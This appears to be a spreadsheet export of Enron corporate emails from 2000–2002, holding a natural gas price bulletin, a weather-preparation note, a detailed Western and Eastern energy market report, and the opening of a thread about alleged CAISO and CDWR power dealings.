&lt;P&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
&lt;P ALIGN=CENTER&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            _x000D_
&lt;FONT SIZE=+1&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              _x000D_
&lt;B&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
IntercontinentalExchange                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
&lt;/B&gt;&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
&lt;/FONT&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
Firm Physical Natural Gas Price Bulletin                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
_x000D_
&lt;BR&gt;&lt;B&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
For Natural Gas Delivered on Tuesday, December  18, 2001                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
&lt;/B&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;FONT SIZE=-1&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              _x000D_
&lt;I&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
(Trade Date of Monday, December  17, 2001)                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  _x000D_
&lt;/I&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;/FONT&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
&lt;BR&gt;&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _x000D_
Click here to access &lt;A HREF="http://www.intcx.com/SubscriberServlet/subscriberservlet.class?operation=gasIndexForm&amp;hub=All"&gt;index history&lt;/A&gt;.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             _x000D_
&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;BR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
_x000D_
&lt;FONT SIZE=-1&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              _x000D_
&lt;I&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
* volume represents sell-side only *                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;/I&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;/FONT&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
&lt;/P&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;TABLE ALIGN="CENTER" WIDTH="100%"  cellspacing="8"&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;TR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;TH align=left valign=bottom width="15%"&gt; &lt;FONT size=-1&gt;&lt;U&gt;&lt;I&gt;Region&lt;/I&gt;&lt;/U&gt;&lt;BR&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;U&gt;Hub&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;&lt;TH align=right valign=bottom width="6%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;High&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                _x000D_
&lt;TH align=right valign=bottom width="6%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Low&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               _x000D_
&lt;TH align=right valign=bottom width="8%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Wtd Avg Index&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
&lt;TH align=right valign=bottom width="8%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Change ($)&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;TH align=right valign=bottom width="9%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Vol (mmBtu)&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       _x000D_
_x000D_
&lt;TH align=left valign=bottom width="42%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Hub Name&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;&lt;/TR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
&lt;/TR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       _x000D_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;&lt;I&gt;&lt;BR&gt;LOUISIANA&lt;BR&gt;&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;NOBR&gt;ANR SE&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $2.5500&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $2.4500&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;          $2.5065&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;+&lt;/B&gt;    .1619&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;         167,800&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;American Natural Resources Pipleline Co. - SE  Transmission Pool&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;                                                                                                                                                                                                  _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;NOBR&gt;Columbia Onshore&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $2.5500&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $2.4500&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;          $2.5096&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;+&lt;/B&gt;    .1344&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;         220,600&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;Columbia Gulf Transmission Co. - Onshore Pool &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;                                                                                                                                                                                                          _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;NOBR&gt;Henry Hub&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $2.5900&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $2.4900&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;          $2.5466&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;+&lt;/B&gt;    .1427&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;         878,100&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;Henry Hub - Tailgate, Louisiana &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;                                                                                                                                                                                                                               _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;NOBR&gt;NGPL LA&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $2.5600&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $2.4400&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;          $2.4998&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;+&lt;/B&gt;    .1318&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;         195,100&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;Natural Gas Pipeline Co. of America - L</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 07:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.superty@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Inclement Weather Planning 12/13 &amp; 12/14</t>
  </si>
  <si>
    <t xml:space="preserve">  Bob/Bob, _x000D_
_x000D_
  FYI - Daren has let me know that, according to next weeks weather report it _x000D_
will be getting cold and possibly icy, Wednesday and Thursday _x000D_
  of next week.  The Texas Desk has reserved 15 rooms at the Hyatt in _x000D_
preparation of this Inclement Weather.   Please let me know if you think _x000D_
  the other regions should prepare in this way as well. _x000D_
_x000D_
   Wednesday the high is 38, low 32_x000D_
  Thursday              high is 40, low 27_x000D_
_x000D_
_x000D_
_x000D_
   Thanks! :  ) Heather </t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 12:18:17 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Energy Market Report - 1/28/02</t>
  </si>
  <si>
    <t>_x000D_
Subject: Energy Market Report - 1/28/02_x000D_
_x000D_
_x000D_
Energy Market Report_x000D_
Monday, January 28, 2002_x000D_
_x000D_
*See attached pdf file._x000D_
___________________________________________________________x000D_
Western Pre-Scheduled Firm Electricity Prices($/MWh)_x000D_
January 28, 2002 for January 29, 2002_x000D_
_x000D_
Peak(Heavy)_x000D_
                   Low      Change     High     Change_x000D_
NW/N. Rockies     18.80     -2.95      22.00    -0.50_x000D_
Mid-Columbia      18.80     -2.95      22.00    -0.50_x000D_
COB               21.00     -2.25      22.25    -2.50_x000D_
N. California     23.50     -1.50      25.00    -1.50_x000D_
Midway/Sylmar       NA        NA         NA       NA_x000D_
S. California     23.00     -2.00      25.00    -2.00_x000D_
Mead              22.75     -2.50      25.75    -1.25_x000D_
Palo Verde        22.75     -0.75      25.75     0.00_x000D_
Inland SW         19.50     -4.00      25.75    -1.25_x000D_
4-Corners         23.00     -1.50      24.50    -1.50_x000D_
Central Rockies   22.00      0.25      26.00     3.25_x000D_
___________________________________________________________x000D_
Off-Peak(Light)_x000D_
                   Low      Change     High     Change_x000D_
NW/N. Rockies     17.25     -3.75      18.50    -3.50_x000D_
Mid-Columbia      17.25     -3.75      18.50    -3.50_x000D_
COB               17.00     -2.00      18.00    -4.00_x000D_
N. California     16.75     -4.75      19.50    -4.00_x000D_
Midway/Sylmar       NA        NA         NA       NA_x000D_
S. California     17.00     -4.00      19.00    -4.00_x000D_
Mead              17.50     -3.50      19.50    -3.50_x000D_
Palo Verde        14.00     -3.75      16.50    -4.00_x000D_
Inland SW         13.50     -4.25      16.50    -6.50_x000D_
4-Corners         14.50     -4.50      16.50    -4.00_x000D_
Central Rockies   11.50     -4.50      13.50    -6.00_x000D_
__________________________________________________________x000D_
Enron-omic Stimulus?_x000D_
_x000D_
Despite the continuing grip of a cold snap, and a rash of unit outages over_x000D_
the weekend, most Western power prices for Tuesday delivery ended slightly_x000D_
weaker in the first trading session of the new week.  "Flows are up and_x000D_
hydro's cheap," explained one marketer of the weather's inability to inject_x000D_
strength into Western markets.  "If the weather weren't as cold as it is,_x000D_
the market could even be worse for sellers."  As usual over the past few_x000D_
months, references to Enron were peppered across the mainstream media on_x000D_
Monday.  UBS Warburg, the Swiss bank that is in the process of purchasing_x000D_
the now-defunct EnronOnLine, plans to have the trading business in full_x000D_
operation by the end of February.  To staff the reborn operation, UBS_x000D_
Warburg has offered contracts to about 625 of EnronOnLine's 800 former_x000D_
employees.  The transaction is still pending the approval of various federal_x000D_
agencies.  In another chapter of the Enron saga, Vice Chairman J. Clifford_x000D_
Baxter's death was ruled a suicide by Harris County Medical Examiner Joye_x000D_
Carter on Saturday.  Baxter was considered an important potential witness in_x000D_
the Enron affair after whistle-blower Sherron Watkins cited his discussion_x000D_
with then-CEO Jeff Skilling about the company's dubious accounting_x000D_
practices.  A suicide note was found at the scene, but the details of the_x000D_
note have not yet been released.  Equally serious are allegations made by_x000D_
Rep. Henry Waxman of California, indicating that the White House had_x000D_
apparently changed the contents of a draft energy proposal circulated_x000D_
through Congress in March of last year to add a provision that specifically_x000D_
aided Enron Corp. in India.  According to Rep. Waxman, "the provision_x000D_
appears to have been added to the plan during the period in which the White_x000D_
House directly controlled the drafting."  The Bush Administration has_x000D_
understandably tried to distance itself from their biggest political_x000D_
contributor, denying that its energy plan was crafted to help Enron.  In_x000D_
related news, GAO head David M. Walker will likely sue Vice President Dick_x000D_
Cheney for refusing to turn over documents relating to the VP's meetings_x000D_
with Enron representatives last year.  It would mark the first time the_x000D_
investigative arm of Congress sued another branch of the government for refu_x000D_
sal to cooperate with an inquiry.  The Vice President insisted that the GAO_x000D_
was overstepping its bounds. "Their jurisdiction extends to agencies created_x000D_
by statute. That's not me," asserted Cheney, "I'm a constitutional officer._x000D_
And the authority of the GAO does not extend in that case to my office."_x000D_
Save it for the judge, Dick.  In gas news, NYMEX Henry Hub natural gas_x000D_
futures fell hard in Monday trading, with the February contract losing 12.9_x000D_
cents to settle at 1.908$/mmBtu, and the March contract close behind,_x000D_
plummeting 12 cents to close at 1.984$/mmBtu._x000D_
_x000D_
Heavy load energy prices in the Northwest fell almost 2$/MWh on the low end_x000D_
for Tuesday delivery.  Healthy hydro flows and a cold front that did not_x000D_
quite live up to its prediction took the brunt of the blame.  Peak goods at_x000D_
Mid-Columbia changed hands from 18.8 to 22$/MWh on Monday.  Flows at Chief_x000D_
Joseph remained as strong as ever this year, coming in at 110 kcfs Tuesday,_x000D_
105 kcfs Wednesday and Thursday, 100 kcfs Friday, 85 kcfs Saturday, 65 kcfs_x000D_
Sunday, and 110 kcfs next Monday.  Temperatures were predicted to remain_x000D_
well below normal through Friday, with lows expected to flirt with freezing._x000D_
The latest six-to-ten likewise called for temperatures to remain near to_x000D_
below normal from February 3 to 7.  There were no new unit outages to report_x000D_
on Monday._x000D_
_x000D_
Despite cold weather and a modest rise in natural gas values at the Socal_x000D_
border, day-ahead electricity prices softened in the Golden State on Monday._x000D_
Heavy load goods lost about 2$/MWh everywhere, while light load prices took_x000D_
a bigger hit, slipping almost 4$/MWH.  Peak power at SP15 traded between 23_x000D_
and 25$/MWh, with the bulk of deals done closer to the high end, above_x000D_
24.25$/MWh. In California politicking, the CPUC voted to reject a compromise_x000D_
put forth by SDG&amp;E parent Sempra Energy.  The proposal would have used $219_x000D_
million of the $363 million earned selling power from five-year contracts at_x000D_
wholesale prices last summer to pay down the balancing account, and thus_x000D_
benefiting SDG&amp;E rate payers, while allocating the remaining $144 million to_x000D_
shareholders.  The CPUC said they think the courts will award a higher_x000D_
number to the balancing account. Californians may soon be allowed to choose_x000D_
their power provider again, if CPUC administrative law judge Robert Barnett_x000D_
has his way.  The initiative, a cornerstone of the 1996 deregulation bill,_x000D_
was revoked September 20, 2001.  However, consumers would have to hurry_x000D_
their selection, as the option would be back in play for a limited time,_x000D_
through July 1, 2002.  Barnett said competitive choice was essential to keep_x000D_
utility customers from unfairly footing the bill for last year's energy_x000D_
crisis.  On the generation front, Morro Bay #4 (336 MW) and Pittsburg #7_x000D_
(682 MW) returned to service over the weekend.  Helms PGP #1 (407 MW) joined_x000D_
sister unit #2 (407 MW) in the out of service category on Monday.  Alamitos_x000D_
#3 (320 MW) exited the grid on January 26.  Hydro Big Creek (1,020 MW) was_x000D_
derated, operating at 720 MW.  Sutter Plants (546 MW) was generating at 270_x000D_
MW.  Tuesday forecasts called for temperatures to linger almost 10 degrees_x000D_
below normal, with highs in the upper-40s to mid-50s across the state.  The_x000D_
latest six-to-ten predicted below-normal temperatures from February 3 to 7._x000D_
_x000D_
The Southwest was a slight exception to the conditions prevalent across the_x000D_
WSCC on Monday.  While temperatures were lower than on Friday, peak power_x000D_
prices remained mostly flat.  Heavy load pieces at Palo Verde traded between_x000D_
22.75 and 25.75$/MWh, a loss of 75 cents on the low end and no change on the_x000D_
high.  Temperatures were expected to linger well below normal through_x000D_
Friday, and the latest six-to-ten predicted likewise from February 3 to 7._x000D_
In unit news, coal-fired Navajo #3 (750 MW) returned to the grid Monday_x000D_
morning, while the ETR for Coronado #1 (395 MW) was revised to early morning_x000D_
Tuesday, January 29.  Fellow coal unit Huntington #2 (455 MW) also climbed_x000D_
back onto the grid over the weekend after repairing a tube leak._x000D_
_x000D_
David Ramberg and Jessie Norris_x000D_
__________________________________________________________x000D_
_x000D_
Western Generating Unit Outages_x000D_
_x000D_
Current                            Begins          Ends          Reason_x000D_
CAISO units &lt;250/7145 total          NA             NA_x000D_
planned/unplanned*_x000D_
Alamitos #3/320/gas               26-Jan-02         ?            planned*_x000D_
Alamitos #6/480/gas               20-Jan-02         ?            planned_x000D_
Big Creek Project/1020/hydro      28-Jan-02         ?        @710MW,_x000D_
planned*_x000D_
Colstrip #3/700/coal              11-Jan-02         ?            repairs_x000D_
Corondado #1/395/coal             25-Jan-02     29-Jan-02        tube leak*_x000D_
Encina #4/303/gas                 12-Jan-02         ?            unplanned_x000D_
Etiwanda #4/320/gas               21-Jan-02         ?            planned_x000D_
Four Corners #5                   09-Jan-02     14-Mar-02 @392MW,_x000D_
maintenance*_x000D_
Grand Coulee #19/600/hydro        10-Dec-01       March          repairs_x000D_
Haynes #6/341/gas                 07-Jan-02         ?            planned_x000D_
Helms PGP #1/407/hydro            28-Jan-02         ?            planned*_x000D_
Helms PGP #2/407/hydro            01-Oct-01         ?            planned_x000D_
Hyatt/Thermalito/933/hydro        02-Oct-01         ?      @665 MW,_x000D_
unplanned*_x000D_
Moss Landing #7/739/gas           29-Dec-01         ?            planned_x000D_
Ormond Beach #1/725/gas           28-Dec-01         ?            planned_x000D_
Ormond Beach #2/750/gas           05-Oct-01         ?      @350 MW,_x000D_
unplanned_x000D_
Pittsburg #6/317/gas              22-Nov-01         ?            planned_x000D_
Scattergood #3/445/gas            22-Jan-02         ?            maintenance_x000D_
Sutter Plants/546/gas             28-Jan-02         ?      @270 MW,_x000D_
unplanned*_x000D_
_x000D_
Future_x000D_
Navajo #2/750/coal                02-Feb-02     25-Feb-02        maintenance_x000D_
_x000D_
For unit owners refer to pdf version._x000D_
*Indicates a change from previous EMR._x000D_
_______________________________________________________________________x000D_
_x000D_
Eastern Markets Pre-Scheduled Firm Power Prices ($/MWh)_x000D_
_x000D_
January 28, 2002 for January 29, 2002_x000D_
_x000D_
Peak (Heavy) in $/MWh_x000D_
                 Low     Change   High      Change_x000D_
Into Cinergy    17.00    -0.20    18.50      0.50_x000D_
Western PJM     20.95    -1.30    22.10     -0.40_x000D_
Into Entergy    15.50    -1.40    18.00     -0.25_x000D_
Into TVA        16.25    -0.50    17.50      0.40_x000D_
ERCOT           17.00     0.00    17.50      0.25_x000D_
____________________________________________________________x000D_
As unseasonably warm weather continued and traders harbored little hope of_x000D_
an upside in the gas market, peak power prices remained mostly steady on_x000D_
Monday across the Eastern Interconnect.  Traders reported light trading_x000D_
volume and lots of sunshine outside their windows.  NYMEX Henry Hub natural_x000D_
gas futures reached new contract lows on Monday, a familiar refrain heard_x000D_
during the past week.  February lost 12.9 cents in its second to last_x000D_
trading session, ending the day at 1.908$/mmBtu.  March plunged a similar 12_x000D_
cents to close at 1.984$/mmBtu._x000D_
_x000D_
With a healthy generation landscape and temperatures more usual to late_x000D_
spring blanketing the region, day-ahead peak electricity prices settled_x000D_
lower in the Mid-Atlantic on Monday.  Western PJM goods for Tuesday delivery_x000D_
changed hands between 20.95 and 22.1$/MWh, with most deals done in the 21.05_x000D_
to 21.5$/MWh range.  Balance of the week trades were heard around 21.7$/MWh,_x000D_
while balance of the month deals went through near 23.4$/MWh.  Despite an_x000D_
unusual brief spike to 73$/MWh just after 13:00 EST, LMPs were averaging_x000D_
21.26$/MWh through 15:00 EST.  Traders reported lackluster trading and no_x000D_
new outages on Monday.  Tuesday forecasts called for high temperatures to_x000D_
linger in the balmy 63 to 68 degree range across PJM, before cooling about 5_x000D_
degrees on Wednesday.  The most current six-to-ten predicted normal_x000D_
temperatures from February 3 to 7._x000D_
_x000D_
Despite record highs near 60 degrees and more of the same expected for_x000D_
Tuesday, heavy load energy costs were flat to slightly higher in the Midwest_x000D_
on Monday.  Into Cinergy deals for Tuesday delivery were heard between 17_x000D_
and 18.5$/MWh, with the bulk of transactions from 17.75 to 18$/MWh.  Most_x000D_
traders were surprised by the relative strength of the Cinergy hub.  "I_x000D_
suspect there are quite a few coal units turned off, and most maintenance_x000D_
schedules have been pushed forward, since the generation clearly isn't_x000D_
needed," commented one ECAR trader.  In unit news, Quad Cities #1 (821 MW)_x000D_
remained down for pump support maintenance.  Sources said they expected_x000D_
sister unit #2 (821 MW) to be taken off-line for the same repairs when #1_x000D_
returned to the grid, possibly as soon as this week.  The south shore of_x000D_
Lake Erie, a region where January snow is usually measured in feet, enjoyed_x000D_
high temperatures in the low-60s on Monday and anticipated the same on_x000D_
Tuesday.  Indeed, all of ECAR expected similar conditions for Tuesday, while_x000D_
cooling into the upper-40s was forecast for Wednesday.  The latest_x000D_
six-to-ten called for normal temperatures from February 3 to 7._x000D_
_x000D_
As weak weather-related demand dominated SERC and Texas, peak power prices_x000D_
weakened on Monday.  Into Entergy deals were done between 15.5 and 18$/MWh,_x000D_
with the low end reached late in the day.  "I don't see any possibility of a_x000D_
rally for February.  Gas was hammered again today; the market is very soft_x000D_
right now," commented one SERC realist.  Tuesday was expected to see high_x000D_
temperatures solidly in the 70s across SERC and Texas, with slight cooling_x000D_
predicted as the week progresses.  The most current six-to-ten called for_x000D_
normal temperatures from February 3 to 7._x000D_
____________________________________________________________x000D_
_x000D_
California ISO Congestion Index in $/MWh_x000D_
_x000D_
                         Path                 Peak   Off-peak_x000D_
for 27-Jan-02         NW1 to NP15             0.00     0.00_x000D_
                      NW3 to SP15             0.00     0.00_x000D_
                      AZ3 to SP15             1.25     3.75_x000D_
                      LC1 to SP15             0.00     0.00_x000D_
                      SP15 to NP15            0.00     0.00_x000D_
_x000D_
                         Path                 Peak   Off-peak_x000D_
for 28-Jan-02         NW1 to NP15             0.00     0.00_x000D_
                      NW3 to SP15             0.00     0.00_x000D_
                      AZ3 to SP15             0.00     0.00_x000D_
                      LC1 to SP15             0.00     0.00_x000D_
                      SP15 to NP15            0.00     0.00_x000D_
_x000D_
                         Path                 Peak   Off-peak_x000D_
for 29-Jan-02         NW1 to NP15             0.00     0.00_x000D_
                      NW3 to SP15             0.00     0.00_x000D_
                      AZ3 to SP15             0.00    52.75_x000D_
                      LC1 to SP15             0.00     0.00_x000D_
                      SP15 to NP15            0.00     0.00_x000D_
_x000D_
_x000D_
_x000D_
OTC Forward Peak Electricity Contracts in $/MWh_x000D_
_x000D_
                    Mid-C              PV              SP-15_x000D_
                Bid      Ask      Bid      Ask      Bid      Ask_x000D_
BOM            20.00    21.00    22.50    23.50    23.00    24.00_x000D_
February       17.00    18.50    21.00    22.00    22.50    23.50_x000D_
March          15.00    16.50    20.75    21.75    21.50    22.50_x000D_
April          16.00    17.50      NA       NA       NA       NA_x000D_
Q2 '02         15.75    17.25    24.00    25.00    23.50    24.50_x000D_
Q3 '02         29.50    31.00    37.00    38.00    36.50    37.50_x000D_
Q4 '02         27.00    28.50    26.50    27.50    28.25    29.25_x000D_
Q1 '03         27.50    29.00      NA       NA       NA       NA_x000D_
Cal '03        28.75    30.25    32.00    33.00    33.50    34.50_x000D_
_x000D_
Represents the most recent bid/ask spread obtainable_x000D_
by the Energy Market Report._x000D_
_x000D_
_x000D_
_x000D_
Alberta Power Pool Index (C$/MWh)_x000D_
_x000D_
                    Peak(14)   Peak(16)   Off-Peak    Flat     Change_x000D_
for  25-Jan-02       37.57      37.27      16.23      30.95    -3.26_x000D_
for  26-Jan-02       23.80      22.52      11.86      19.17     0.00_x000D_
for  27-Jan-02       25.82      24.32      11.45      20.25     0.00_x000D_
_x000D_
_x000D_
_x000D_
BPA's Offer for 01/30/02._x000D_
_x000D_
Hours        Amount          NW delivered        COB/NOB delivered_x000D_
7-22         200MW           Market Price*          Market Price*_x000D_
_x000D_
*Market price will be determined at time of request._x000D_
_x000D_
_x000D_
_x000D_
NYMEX Henry Hub Gas Futures in $/mmBtu_x000D_
_x000D_
                 Close        Change_x000D_
        Feb      1.908        -0.129_x000D_
        Mar      1.984        -0.120_x000D_
_x000D_
_x000D_
_x000D_
Natural Gas Spot Prices in $/mmBtu_x000D_
_x000D_
                  Low          High_x000D_
Sumas             2.02         2.07_x000D_
So. Cal Border    2.05         2.10_x000D_
San Juan          1.92         1.97_x000D_
___________________________________________________________x000D_
_x000D_
Economic Insight, Inc. - 3004 SW First, Portland, Oregon 97201,_x000D_
Telephone (503) 222-2425, Internet e-mail emr@econ.com -_x000D_
Copyright, Economic Insight, Inc. 2002.</t>
  </si>
  <si>
    <t>Fri, 24 Aug 2001 12:00:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'dave.perrino@enron.com', 'bill.williams@enron.com', 'l..nicolay@enron.com', 'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'steve.walton@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'robert.frank@enron.com', 'karen.denne@enron.com', 'legal &lt;.hall@enron.com&gt;', 'chris.mallory@enron.com', 'b..sanders@enron.com', 'susan.mara@enron.com', 'd..steffes@enron.com', 'robert.badeer@enron.com', 'pr &lt;.palmer@enron.com&gt;'})</t>
  </si>
  <si>
    <t>RE: As the CAISO Turns:  CAISO involved in scam with CDWR to_x000D_
 purchase excess power from CDWR's long-term contracts</t>
  </si>
  <si>
    <t>Since Congressman's Ose's been asking FERC alot of questons about what the ISO, DWR, etc. have been up to, perhaps he could write a "Dear FERC" letter saying "here's what I'm hearing, it sounds serious and you need to investigate, pronto, and get back to me ASAP with your conclusions."_x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hall, Steve C.  _x000D_
Sent:	Friday, August 24, 2001 1:52 PM_x000D_
To:	Alvarez, Ray; Dasovich, Jeff; Frank, Robert; Mara, Susan; Nicolay, Christi L.; Novosel, Sarah; Perrino, Dave; Steffes, James D.; Walton, Steve; Palmer, Mark A. (PR); Comnes, Alan; Badeer, Robert; Williams III, Bill; Mallory, Chris; Denne, Karen; Belden, Tim; Yoder, Christian; Sanders, Richard B._x000D_
Subject:	As the CAISO Turns:  CAISO involved in scam with CDWR to purchase excess power from CDWR's long-term contracts_x000D_
_x000D_
Everyone,_x000D_
_x000D_
This is hot news showing that the CAISO/CDWR relationship is even more cozy than we thought.  I am not sure how to best use this information, but this scam needs to be brought to the public's and FERC's attention._x000D_
_x000D_
